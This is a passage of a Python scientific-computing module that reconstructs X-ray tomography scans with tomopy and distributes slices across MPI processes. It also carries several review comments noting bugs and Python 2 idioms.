    locals (they were missing from the ``global`` declaration), so the
    module-level ``_usempi`` could never become True and ``comm.Barrier()``
    in recon2()/recon3() raised NameError under MPI.

    Parameters
    ----------
    usempi : bool
        True: import mpi4py and record this process's rank and the world
        communicator size.  False: restore single-process defaults.
    """
    global _usempi, _nprocs, _rank, comm
    if usempi:
        # Imported lazily so mpi4py is only required when MPI is requested.
        from mpi4py import MPI
        comm = MPI.COMM_WORLD
        _usempi = True
        _nprocs = comm.Get_size()
        _rank = comm.Get_rank()
    else:
        _usempi = False
        _nprocs = 1
        _rank = 0
def set_mp(ncore=None, nchunk=None):
    """Record the multiprocessing parameters forwarded to tomopy calls.

    ncore : number of worker cores (None lets tomopy decide).
    nchunk : rows per worker chunk (None lets tomopy decide).
    """
    global _ncore
    global _nchunk
    _ncore = ncore
    _nchunk = nchunk
# def set_z_recon_size(z_recon_size=None):
# global _z_recon_size
# _z_recon_size = z_recon_size
def show_settings():
    """Print the current MPI/multiprocessing settings, one per line."""
    for label, value in (("rank", _rank),
                         ("nprocs", _nprocs),
                         ("ncore", _ncore),
                         ("nchunk", _nchunk)):
        print(label, "=", value)
    # print("z_recon_size =", _z_recon_size)
def gen_theta(n, period=np.pi):
    """Return ``n`` equally spaced projection angles in [0, period).

    Uses ``np.linspace(..., endpoint=False)`` instead of the original
    ``np.arange(0, period, period/n)``: arange with a floating-point step
    can return n+1 samples when rounding pushes the last value just below
    ``period``, whereas linspace guarantees exactly ``n`` samples.

    Parameters
    ----------
    n : int
        Number of angles.
    period : float
        Angular range (default: pi, i.e. a half rotation).
    """
    return np.linspace(0, period, n, endpoint=False)
def gen_theta_timbir(K, N_theta, SlewSpeed=0, MinAcqTime=0, TotalNumCycles=1):
    """Generate TIMBIR interlaced scan angles, discarding unreachable ones.

    Angles that the rotation stage cannot acquire (given its slew speed and
    the minimum acquisition time) are dropped from the returned array.
    """
    thetas = _gen_theta_timbir(K, N_theta, TotalNumCycles)
    # Maximum angular travel (radians) during one acquisition interval.
    max_travel = SlewSpeed * np.pi / 180 * MinAcqTime
    dropped = calc_dropped_angles(thetas, max_travel, verbose=True,
                                  TotalNumCycles=TotalNumCycles)
    return thetas[~dropped]
def recon(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, phase_retrieval=False,
          opt_center=False, diag_center=False, output="tiff"):
    """Reconstruct one full-z tomogram per scan cycle.

    For each cycle: reads that cycle's projections plus white/dark frames
    from the HDF5 file, optionally normalizes, removes ring artifacts and
    retrieves phase, then runs tomopy gridrec and writes HDF5 / TIFF-stack /
    raw-binary output depending on substrings in ``output``.

    io_paras : dict with 'datafile', 'out_dir' and optional 'path2white',
        'path2dark', 'diag_cent_dir', 'recon_dir', 'out_prefix'.
    data_paras : dict of dataset geometry/frame ranges ('NumCycles',
        'ProjPerCycle', 'cycle_offset', 'proj_start', z/x ranges,
        white/dark frame ranges).
    rot_center : rotation center in pixels; auto-detected when None.

    NOTE(review): Python 2 code (xrange); port to range() for Python 3.
    """
    # Input and output
    datafile = io_paras.get('datafile')
    path2white = io_paras.get('path2white', datafile)
    path2dark = io_paras.get('path2dark', path2white)
    out_dir = io_paras.get('out_dir')
    diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
    recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
    out_prefix = io_paras.get('out_prefix', "recon_")

    # Parameters of dataset
    NumCycles = data_paras.get('NumCycles', 1)  # Number of cycles used for recon
    ProjPerCycle = data_paras.get('ProjPerCycle')  # Number of projections per cycle, N_theta
    cycle_offset = data_paras.get('cycle_offset', 0)  # Offset in output cycle number
    proj_start = data_paras.get('proj_start', 0)  # Starting projection of reconstruction
    proj_step = data_paras.get('proj_step')
    z_start = data_paras.get('z_start', 0)
    z_end = data_paras.get('z_end', z_start+1)
    z_step = data_paras.get('z_step')
    x_start = data_paras.get('x_start')
    x_end = data_paras.get('x_end', x_start+1)
    x_step = data_paras.get('x_step')
    white_start = data_paras.get('white_start')
    white_end = data_paras.get('white_end')
    dark_start = data_paras.get('dark_start')
    dark_end = data_paras.get('dark_end')

    # Remember the caller-supplied center: odd cycles are mirrored, which
    # mirrors the center too (see the flip block below).
    rot_center_copy = rot_center

    for cycle in xrange(NumCycles):
        # Set start and end of each cycle
        projections_start = cycle * ProjPerCycle + proj_start
        projections_end = projections_start + ProjPerCycle
        slice1 = slice(projections_start, projections_end, proj_step)
        slice2 = slice(z_start, z_end, z_step)
        slice3 = slice(x_start, x_end, x_step)
        slices = (slice1, slice2, slice3)
        white_slices = (slice(white_start, white_end), slice2, slice3)
        dark_slices = (slice(dark_start, dark_end), slice2, slice3)
        print("Running cycle #%s (projs %s to %s)"
              % (cycle, projections_start, projections_end))

        # Read HDF5 file.
        print("Reading datafile %s..." % datafile, end="")
        sys.stdout.flush()
        data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
                                                path2white=path2white, path2dark=path2dark)
        theta = gen_theta(data.shape[0])
        print("Done!")
        print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
              % (data.shape, white.shape, dark.shape))

        ## Normalize dataset using data_white and data_dark
        if normalize:
            print("Normalizing data ...")
            # white = white.mean(axis=0).reshape(-1, *data.shape[1:])
            # dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
            # data = (data - dark) / (white - dark)
            data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)[...]

        ## Remove stripes caused by dead pixels in the detector
        if stripe_removal:
            print("Removing stripes ...")
            data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=2,
                                           pad=True, ncore=_ncore, nchunk=None)
            # data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
            #                                ncore=None, nchunk=None)

        # # Show preprocessed projection
        # plt.figure("%s-prep" % projections_start)
        # plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
        # plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
        #             % projections_start)
        # # plt.show()
        # continue

        ## Phase retrieval
        if phase_retrieval:
            print("Retrieving phase ...")
            data = tomopy.retrieve_phase(data,
                                         pixel_size=1e-4, dist=50, energy=20,
                                         alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)

        ## Determine and set the center of rotation
        if opt_center or (rot_center == None):
            ### Using optimization method to automatically find the center
            # d.optimize_center()
            print("Optimizing center ...", end="")
            sys.stdout.flush()
            rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
                                            tol=0.5, mask=True, ratio=1.)
            print("Done!")
            print("center = %s" % rot_center)
        if diag_center:
            ### Output the reconstruction results using a range of centers,
            ### and then manually find the optimal center.
            # d.diagnose_center()
            if not os.path.exists(diag_cent_dir):
                os.makedirs(diag_cent_dir)
            print("Testing centers ...", end="")
            sys.stdout.flush()
            # NOTE(review): center_start/center_end/center_step are not defined
            # in this function -- NameError unless they exist as module globals.
            tomopy.write_center(data, theta, dpath=diag_cent_dir,
                                cen_range=[center_start, center_end, center_step],
                                ind=None, emission=False, mask=False, ratio=1.)
            print("Done!")

        ## Flip odd frames
        # NOTE(review): raises TypeError on odd cycles if the function was
        # called with rot_center=None (rot_center_copy stays None) -- confirm.
        if (cycle % 2):
            data[...] = data[...,::-1]
            rot_center = data.shape[-1] - rot_center_copy
        else:
            rot_center = rot_center_copy

        ## Reconstruction using FBP
        print("Running gridrec ...", end="")
        sys.stdout.flush()
        recon = tomopy.recon(data, theta, center=rot_center, emission=False, algorithm='gridrec',
                             # num_gridx=None, num_gridy=None, filter_name='shepp',
                             ncore=_ncore, nchunk=_nchunk)
        print("Done!")

        ## Collect background
        # if cycle == 0:
        #     bg = recon
        # elif cycle < 4:
        #     bg += recon
        # else:
        #     recon -= bg/4.

        # Write to stack of TIFFs.
        if not os.path.exists(recon_dir):
            os.makedirs(recon_dir)
        out_fname = recon_dir+"/"+out_prefix+"t_%d" % (cycle + cycle_offset)

        if "hdf" in output:
            hdf_fname = out_fname + ".hdf5"
            print("Writing reconstruction output file %s..."
                  % hdf_fname, end="")
            sys.stdout.flush()
            tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
            print("Done!")

        if "tif" in output:
            tiff_fname = out_fname + ".tiff"
            print("Writing reconstruction tiff files %s ..."
                  % tiff_fname, end="")
            sys.stdout.flush()
            tomopy.write_tiff_stack(recon, fname=tiff_fname, axis=0, digit=5, start=0, overwrite=False)
            print("Done!")

        if "bin" in output:
            bin_fname = out_fname + ".bin"
            print("Writing reconstruction to binary files %s..."
                  % bin_fname, end="")
            sys.stdout.flush()
            recon.tofile(bin_fname)
def recon2(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, phase_retrieval=False,
           opt_center=False, diag_center=False, output="tiff"):
    """Reconstruct slice-by-slice, distributing z slices over MPI ranks.

    Same pipeline as recon(), but the z range is processed one slice at a
    time and the slices are round-robin assigned to MPI ranks
    (range(_rank, len(z_list), _nprocs)), so each rank reads and
    reconstructs only its own subset.

    Parameters are as in recon().  Output filenames additionally encode the
    z index.  NOTE(review): Python 2 code (xrange).
    """
    # Input and output
    datafile = io_paras.get('datafile')
    path2white = io_paras.get('path2white', datafile)
    path2dark = io_paras.get('path2dark', path2white)
    out_dir = io_paras.get('out_dir')
    diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
    recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
    out_prefix = io_paras.get('out_prefix', "recon_")

    # Parameters of dataset
    NumCycles = data_paras.get('NumCycles', 1)  # Number of cycles used for recon
    ProjPerCycle = data_paras.get('ProjPerCycle')  # Number of projections per cycle, N_theta
    cycle_offset = data_paras.get('cycle_offset', 0)  # Offset in output cycle number
    proj_start = data_paras.get('proj_start', 0)  # Starting projection of reconstruction
    proj_step = data_paras.get('proj_step')
    z_start = data_paras.get('z_start', 0)
    z_end = data_paras.get('z_end', z_start+1)
    z_step = data_paras.get('z_step')
    x_start = data_paras.get('x_start')
    x_end = data_paras.get('x_end', x_start+1)
    x_step = data_paras.get('x_step')
    white_start = data_paras.get('white_start')
    white_end = data_paras.get('white_end')
    dark_start = data_paras.get('dark_start')
    dark_end = data_paras.get('dark_end')

    slice3 = slice(x_start, x_end, x_step)
    # Remember the caller-supplied center; odd cycles mirror it (see below).
    rot_center_copy = rot_center

    for cycle in xrange(NumCycles):
        # Set start and end of each cycle
        projections_start = cycle * ProjPerCycle + proj_start
        projections_end = projections_start + ProjPerCycle
        slice1 = slice(projections_start, projections_end, proj_step)

        # Distribute z slices to processes
        if z_step is None:  # global z_step declaration is needed, because assignment is used below, therefore local variable is assumed by default.
            z_step = 1
        z_list = range(z_start, z_end, z_step)
        for i in range(_rank, len(z_list), _nprocs):
            z = z_list[i]
            slice2 = slice(z, z+1)
            slices = (slice1, slice2, slice3)
            white_slices = (slice(white_start, white_end), slice2, slice3)
            dark_slices = (slice(dark_start, dark_end), slice2, slice3)
            print("Running cycle #%s (projs %s to %s, z = %s) on process %s of %s"
                  % (cycle, projections_start, projections_end, z, _rank, _nprocs))

            # Read HDF5 file.
            print("Reading datafile %s..." % datafile, end="")
            sys.stdout.flush()
            data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
                                                    path2white=path2white, path2dark=path2dark)
            theta = gen_theta(data.shape[0])
            print("Done!")
            print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
                  % (data.shape, white.shape, dark.shape))
            # data = tomopy.focus_region(data, dia=1560, xcoord=1150, ycoord=1080,
            #                            center=rot_center, pad=False, corr=True)
            # rot_center = None
            # print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
            #       % (data.shape, white.shape, dark.shape))

            ## Normalize dataset using data_white and data_dark
            if normalize:
                print("Normalizing data ...")
                # white = white.mean(axis=0).reshape(-1, *data.shape[1:])
                # dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
                # data = (data - dark) / (white - dark)
                data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)[...]

            ## Remove stripes caused by dead pixels in the detector
            if stripe_removal:
                print("Removing stripes ...")
                data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=2,
                                               pad=True, ncore=_ncore, nchunk=None)
                # data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
                #                                ncore=None, nchunk=None)

            # # Show preprocessed projection
            # plt.figure("%s-prep" % projections_start)
            # plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
            # plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
            #             % projections_start)
            # # plt.show()
            # continue

            ## Phase retrieval
            if phase_retrieval:
                print("Retrieving phase ...")
                data = tomopy.retrieve_phase(data,
                                             pixel_size=6.5e-5, dist=33, energy=30,
                                             alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)

            ## Determine and set the center of rotation
            if opt_center:  # or (rot_center == None):
                ### Using optimization method to automatically find the center
                # d.optimize_center()
                print("Optimizing center ...", end="")
                sys.stdout.flush()
                rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
                                                tol=0.5, mask=True, ratio=1.)
                print("Done!")
                print("center = %s" % rot_center)
            if diag_center:
                ### Output the reconstruction results using a range of centers,
                ### and then manually find the optimal center.
                # d.diagnose_center()
                if not os.path.exists(diag_cent_dir):
                    os.makedirs(diag_cent_dir)
                print("Testing centers ...", end="")
                sys.stdout.flush()
                # NOTE(review): center_start/center_end/center_step are not
                # defined in this function -- NameError unless module globals.
                tomopy.write_center(data, theta, dpath=diag_cent_dir,
                                    cen_range=[center_start, center_end, center_step],
                                    ind=None, emission=False, mask=False, ratio=1.)
                print("Done!")

            ## Flip odd frames
            # NOTE(review): TypeError on odd cycles if rot_center was None
            # and opt_center is False (rot_center_copy stays None) -- confirm.
            if (cycle % 2):
                data[...] = data[...,::-1]
                rot_center = data.shape[-1] - rot_center_copy
            else:
                rot_center = rot_center_copy

            ## Reconstruction using FBP
            print("Running gridrec ...", end="")
            sys.stdout.flush()
            recon = tomopy.recon(data, theta, center=rot_center, emission=False, algorithm='gridrec',
                                 # num_gridx=None, num_gridy=None, filter_name='shepp',
                                 ncore=_ncore, nchunk=_nchunk)
            print("Done!")

            ## Collect background
            # if cycle == 0:
            #     bg = recon
            # elif cycle < 4:
            #     bg += recon
            # else:
            #     recon -= bg/4.

            # Write to stack of TIFFs.
            if not os.path.exists(recon_dir):
                os.makedirs(recon_dir)
            out_fname = recon_dir+"/"+out_prefix+"t_%d_z_%d" % (cycle + cycle_offset, z)

            if "hdf" in output:
                hdf_fname = out_fname + ".hdf5"
                print("Writing reconstruction output file %s..."
                      % hdf_fname, end="")
                sys.stdout.flush()
                tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
                print("Done!")

            if "tif" in output:
                tiff_fname = out_fname + ".tiff"
                print("Writing reconstruction tiff files %s ..."
                      % tiff_fname, end="")
                sys.stdout.flush()
                tomopy.write_tiff(recon, fname=tiff_fname, overwrite=False)
                print("Done!")

            if "bin" in output:
                bin_fname = out_fname + ".bin"
                print("Writing reconstruction to binary files %s..."
                      % bin_fname, end="")
                sys.stdout.flush()
                recon.tofile(bin_fname)

    # NOTE(review): relies on set_mpi() publishing _usempi and comm as module
    # globals; verify set_mpi actually does so (as written it assigns locals).
    if _usempi:
        comm.Barrier()
    if _rank == 0:
        print("All done!")
def center(io_paras, data_paras, center_start, center_end, center_step, diag_cycle=0,
           mode='diag', normalize=True, stripe_removal=10, phase_retrieval=False):
    """Find or diagnose the rotation center for a TIMBIR interlaced scan.

    Reads the projections of ``diag_cycle`` only, applies the same
    preprocessing as the recon functions, then either:
    - mode containing 'opti': tomopy.find_center (automatic search), and/or
    - mode containing 'diag': tomopy.write_center, writing trial
      reconstructions for centers in [center_start, center_end, center_step]
      so the optimal center can be picked by eye.

    io_paras / data_paras are as in recon(); data_paras additionally carries
    the TIMBIR keys (NumSubCycles, SlewSpeed, MinAcqTime, TotalNumCycles,
    ProjPerRecon).
    """
    # Input and output
    datafile = io_paras.get('datafile')
    path2white = io_paras.get('path2white', datafile)
    path2dark = io_paras.get('path2dark', path2white)
    out_dir = io_paras.get('out_dir')
    diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
    recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
    out_prefix = io_paras.get('out_prefix', "recon_")

    # Parameters of dataset
    NumCycles = data_paras.get('NumCycles', 1)  # Number of cycles used for recon
    ProjPerCycle = data_paras.get('ProjPerCycle')  # Number of projections per cycle, N_theta
    cycle_offset = data_paras.get('cycle_offset', 0)  # Offset in output cycle number
    proj_start = data_paras.get('proj_start', 0)  # Starting projection of reconstruction
    proj_step = data_paras.get('proj_step')
    z_start = data_paras.get('z_start', 0)
    z_end = data_paras.get('z_end', z_start+1)
    z_step = data_paras.get('z_step')
    x_start = data_paras.get('x_start')
    x_end = data_paras.get('x_end', x_start+1)
    x_step = data_paras.get('x_step')
    white_start = data_paras.get('white_start')
    white_end = data_paras.get('white_end')
    dark_start = data_paras.get('dark_start')
    dark_end = data_paras.get('dark_end')

    # TIMBIR parameters
    NumSubCycles = data_paras.get('NumSubCycles', 1)  # Number of subcycles in one cycle, K
    SlewSpeed = data_paras.get('SlewSpeed', 0)  # In deg/s
    MinAcqTime = data_paras.get('MinAcqTime', 0)  # In s
    TotalNumCycles = data_paras.get('TotalNumCycles', 1)  # Total number of cycles in the full scan data
    ProjPerRecon = data_paras.get('ProjPerRecon', ProjPerCycle)  # Number of projections per reconstruction

    # Calculate thetas for interlaced scan
    theta = gen_theta_timbir(NumSubCycles, ProjPerCycle, SlewSpeed, MinAcqTime, TotalNumCycles)
    # ProjPerCycle is re-purposed here as "projections per reconstruction".
    if ProjPerRecon is None:
        ProjPerCycle = theta.size//TotalNumCycles
    else:
        ProjPerCycle = ProjPerRecon
    print("Will use %s projections per reconstruction." % ProjPerCycle)

    # Set start and end of each subcycle
    projections_start = diag_cycle * ProjPerCycle + proj_start
    projections_end = projections_start + ProjPerCycle
    slice1 = slice(projections_start, projections_end, proj_step)
    slice2 = slice(z_start, z_end, z_step)
    slice3 = slice(x_start, x_end, x_step)
    slices = (slice1, slice2, slice3)
    white_slices = (slice(white_start, white_end), slice2, slice3)
    dark_slices = (slice(dark_start, dark_end), slice2, slice3)
    print("Running center diagnosis (projs %s to %s)"
          % (projections_start, projections_end))

    # Read HDF5 file.
    print("Reading datafile %s..." % datafile, end="")
    sys.stdout.flush()
    data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
                                            path2white=path2white, path2dark=path2dark)
    # Offset applied in place before normalization; presumably guards against
    # zero counts -- TODO confirm intent.
    data += 1
    # theta = gen_theta(data.shape[0])
    print("Done!")
    print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
          % (data.shape, white.shape, dark.shape))

    ## Normalize dataset using data_white and data_dark
    if normalize:
        data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)

    ## Remove stripes caused by dead pixels in the detector
    if stripe_removal:
        data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5',
                                       sigma=2, pad=True, ncore=None, nchunk=None)
        # data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
        #                                ncore=None, nchunk=None)

    # # Show preprocessed projection
    # plt.figure("%s-prep" % projections_start)
    # plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
    # plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
    #             % projections_start)
    # # plt.show()
    # continue

    ## Phase retrieval
    if phase_retrieval:
        data = tomopy.retrieve_phase(data,
                                     pixel_size=1.1e-4, dist=5, energy=25.7,
                                     alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)

    ## Determine and set the center of rotation
    ### Using optimization method to automatically find the center
    # d.optimize_center()
    if 'opti' in mode:
        print("Optimizing center ...", end="")
        sys.stdout.flush()
        rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
                                        tol=0.5, mask=True, ratio=1.)
        print("Done!")
        print("center = %s" % rot_center)
    ### Output the reconstruction results using a range of centers,
    ### and then manually find the optimal center.
    if 'diag' in mode:
        if not os.path.exists(diag_cent_dir):
            os.makedirs(diag_cent_dir)
        print("Testing centers ...", end="")
        sys.stdout.flush()
        tomopy.write_center(data, theta, dpath=diag_cent_dir,
                            cen_range=[center_start, center_end, center_step],
                            ind=None, emission=False, mask=False, ratio=1.)
        print("Done!")
def sweep_parameter(levels, sigmas, *args, **kwargs):
    """Run recon3 for every (stripe-removal level, sigma) combination.

    args[0] must be the io_paras dict; its 'out_prefix' is rewritten per
    combination so each sweep point writes to distinctly named output files.
    kwargs is updated in place with 'stripe_removal' and 'stripe_sigma'.
    """
    for lvl in levels:
        for sig in sigmas:
            print("Running level = %s, sigma = %s" % (lvl, sig))
            kwargs['stripe_removal'] = lvl
            kwargs['stripe_sigma'] = sig
            args[0]['out_prefix'] = "recon_sr_l_%s_s_%s_" % (lvl, sig)
            recon3(*args, **kwargs)
def recon3(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, stripe_sigma=2, phase_retrieval=False,
           opt_center=False, diag_center=False, output="tiff", z_recon_size=None):
    """Reconstruct a TIMBIR interlaced scan, chunking z over MPI ranks.

    Like recon2() but: angles come from gen_theta_timbir() and are indexed
    per cycle via theta[slice1]; z slices are grouped into chunks of
    ``z_recon_size`` by get_pool() and the chunks are round-robin assigned
    to MPI ranks; extra output modes "stack" (single multi-z TIFF) and
    "cont" (one continuously appended binary per cycle) are supported.

    Parameters are as in recon()/center(); stripe_sigma is forwarded to
    tomopy.remove_stripe_fw.  NOTE(review): Python 2 code (xrange, file()).
    """
    # Input and output
    datafile = io_paras.get('datafile')
    path2white = io_paras.get('path2white', datafile)
    path2dark = io_paras.get('path2dark', path2white)
    out_dir = io_paras.get('out_dir')
    diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
    recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
    out_prefix = io_paras.get('out_prefix', "recon_")

    # Parameters of dataset
    NumCycles = data_paras.get('NumCycles', 1)  # Number of cycles used for recon
    ProjPerCycle = data_paras.get('ProjPerCycle')  # Number of projections per cycle, N_theta
    cycle_offset = data_paras.get('cycle_offset', 0)  # Offset in output cycle number
    proj_start = data_paras.get('proj_start', 0)  # Starting projection of reconstruction
    proj_step = data_paras.get('proj_step')
    z_start = data_paras.get('z_start', 0)
    z_end = data_paras.get('z_end', z_start+1)
    z_step = data_paras.get('z_step')
    x_start = data_paras.get('x_start')
    x_end = data_paras.get('x_end', x_start+1)
    x_step = data_paras.get('x_step')
    white_start = data_paras.get('white_start')
    white_end = data_paras.get('white_end')
    dark_start = data_paras.get('dark_start')
    dark_end = data_paras.get('dark_end')

    # TIMBIR parameters
    NumSubCycles = data_paras.get('NumSubCycles', 1)  # Number of subcycles in one cycle, K
    SlewSpeed = data_paras.get('SlewSpeed', 0)  # In deg/s
    MinAcqTime = data_paras.get('MinAcqTime', 0)  # In s
    TotalNumCycles = data_paras.get('TotalNumCycles', 1)  # Total number of cycles in the full scan data
    ProjPerRecon = data_paras.get('ProjPerRecon', ProjPerCycle)  # Number of projections per reconstruction

    # Calculate thetas for interlaced scan
    theta = gen_theta_timbir(NumSubCycles, ProjPerCycle, SlewSpeed, MinAcqTime, TotalNumCycles)
    # ProjPerCycle is re-purposed here as "projections per reconstruction".
    if ProjPerRecon is None:
        ProjPerCycle = theta.size//TotalNumCycles
    else:
        ProjPerCycle = ProjPerRecon
    print("Will use %s projections per reconstruction." % ProjPerCycle)

    # Distribute z slices to processes
    if z_step is None:
        z_step = 1
    z_pool = get_pool(z_start, z_end, z_step, z_chunk_size=z_recon_size, fmt='slice')
    slice3 = slice(x_start, x_end, x_step)
    rot_center_copy = rot_center

    for cycle in xrange(NumCycles):
        # Set start and end of each cycle
        projections_start = cycle * ProjPerCycle + proj_start
        projections_end = projections_start + ProjPerCycle
        slice1 = slice(projections_start, projections_end, proj_step)

        # Setup continuous output
        if "cont" in output:
            if not os.path.exists(recon_dir):
                os.makedirs(recon_dir)
            cont_fname = recon_dir+"/"+out_prefix+"t_%d_z_%d_%d.bin" \
                % (cycle + cycle_offset, z_start, z_end)
            # NOTE(review): file() is Python-2-only; use open() on Python 3.
            cont_file = file(cont_fname, 'wb')

        # Distribute z slices to processes
        for i in range(_rank, len(z_pool), _nprocs):
            slice2 = z_pool[i]
            slices = (slice1, slice2, slice3)
            white_slices = (slice(white_start, white_end), slice2, slice3)
            dark_slices = (slice(dark_start, dark_end), slice2, slice3)
            print("Running cycle #%s (projs %s to %s, z = %s - %s) on process %s of %s"
                  % (cycle, projections_start, projections_end, slice2.start, slice2.stop, _rank, _nprocs))

            # Read HDF5 file.
            print("Reading datafile %s..." % datafile, end="")
            sys.stdout.flush()
            data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
                                                    path2white=path2white, path2dark=path2dark)
            # data += 1
            # theta = gen_theta(data.shape[0])
            print("Done!")
            print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
                  % (data.shape, white.shape, dark.shape))
            # data = tomopy.focus_region(data, dia=1560, xcoord=1150, ycoord=1080,
            #                            center=rot_center, pad=False, corr=True)
            # rot_center = None
            # print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
            #       % (data.shape, white.shape, dark.shape))

            ## Normalize dataset using data_white and data_dark
            if normalize:
                print("Normalizing data ...")
                # white = white.mean(axis=0).reshape(-1, *data.shape[1:])
                # dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
                # data = (data - dark) / (white - dark)
                data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=_nchunk)[...]

            ## Remove stripes caused by dead pixels in the detector
            if stripe_removal:
                print("Removing stripes ...")
                data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=stripe_sigma,
                                               pad=True, ncore=_ncore, nchunk=_nchunk)
                # data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
                #                                ncore=None, nchunk=None)

            # # Show preprocessed projection
            # plt.figure("%s-prep" % projections_start)
            # plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
            # plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
            #             % projections_start)
            # # plt.show()
            # continue

            ## Phase retrieval
            if phase_retrieval:
                print("Retrieving phase ...")
                data = tomopy.retrieve_phase(data,
                                             pixel_size=1.1e-4, dist=6, energy=25.7,
                                             alpha=1e-2, pad=True, ncore=_ncore, nchunk=_nchunk)

            ## Determine and set the center of rotation
            if opt_center:  # or (rot_center == None):
                ### Using optimization method to automatically find the center
                # d.optimize_center()
                print("Optimizing center ...", end="")
                sys.stdout.flush()
                rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
                                                tol=0.5, mask=True, ratio=1.)
                print("Done!")
                print("center = %s" % rot_center)
            if diag_center:
                ### Output the reconstruction results using a range of centers,
                ### and then manually find the optimal center.
                # d.diagnose_center()
                if not os.path.exists(diag_cent_dir):
                    os.makedirs(diag_cent_dir)
                print("Testing centers ...", end="")
                sys.stdout.flush()
                # NOTE(review): center_start/center_end/center_step are not
                # defined in this function -- NameError unless module globals.
                tomopy.write_center(data, theta, dpath=diag_cent_dir,
                                    cen_range=[center_start, center_end, center_step],
                                    ind=None, emission=False, mask=False, ratio=1.)
                print("Done!")

            ## Flip odd frames
            # if (cycle % 2):
            #     data[...] = data[...,::-1]
            #     rot_center = data.shape[-1] - rot_center_copy
            # else:
            #     rot_center = rot_center_copy

            ## Reconstruction using FBP
            print("Running gridrec ...", end="")
            sys.stdout.flush()
            recon = tomopy.recon(data, theta[slice1], center=rot_center, emission=False, algorithm='gridrec',
                                 # num_gridx=None, num_gridy=None, filter_name='shepp',
                                 ncore=_ncore, nchunk=_nchunk)
            print("Done!")

            ## Collect background
            # if cycle == 0:
            #     bg = recon
            # elif cycle < 4:
            #     bg += recon
            # else:
            #     recon -= bg/4.

            # Write to stack of TIFFs.
            if not os.path.exists(recon_dir):
                os.makedirs(recon_dir)
            out_fname = recon_dir+"/"+out_prefix+"t_%d_z_" % (cycle + cycle_offset)

            if "hdf" in output:
                hdf_fname = out_fname + "%d_%d.hdf5" % (slice2.start, slice2.stop)
                print("Writing reconstruction output file %s..."
                      % hdf_fname, end="")
                sys.stdout.flush()
                tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
                print("Done!")

            if "tif" in output:
                if "stack" in output:  # single stacked file for multiple z
                    tiff_fname = out_fname + "%d_%d.tiff" % (slice2.start, slice2.stop)
                    print("Writing reconstruction tiff files %s ..."
                          % tiff_fname, end="")
                    sys.stdout.flush()
                    tomopy.write_tiff(recon, fname=tiff_fname, overwrite=False)
                    print("Done!")
                else:  # separate files for different z
                    for iz, z in enumerate(range(slice2.start, slice2.stop, slice2.step)):
                        tiff_fname = out_fname + "%d.tiff" % z
                        print("Writing reconstruction tiff files %s ..."
                              % tiff_fname, end="")
                        sys.stdout.flush()
                        tomopy.write_tiff(recon[iz], fname=tiff_fname, overwrite=False)
                        print("Done!")

            if "bin" in output:
                bin_fname = out_fname + "%d_%d.bin" % (slice2.start, slice2.stop)
                print("Writing reconstruction to binary files %s..."
                      % bin_fname, end="")
                sys.stdout.flush()
                recon.tofile(bin_fname)

            if "cont" in output:
                print("Writing reconstruction to binary files %s..."
                      % cont_fname, end="")
                sys.stdout.flush()
                recon.tofile(cont_file)
                print("Done!")

        if "cont" in output:
            cont_file.close()

    # NOTE(review): relies on set_mpi() publishing _usempi and comm as module
    # globals; verify set_mpi actually does so (as written it assigns locals).
    if _usempi:
        comm.Barrier()
    if _rank == 0:
        print("All done!")
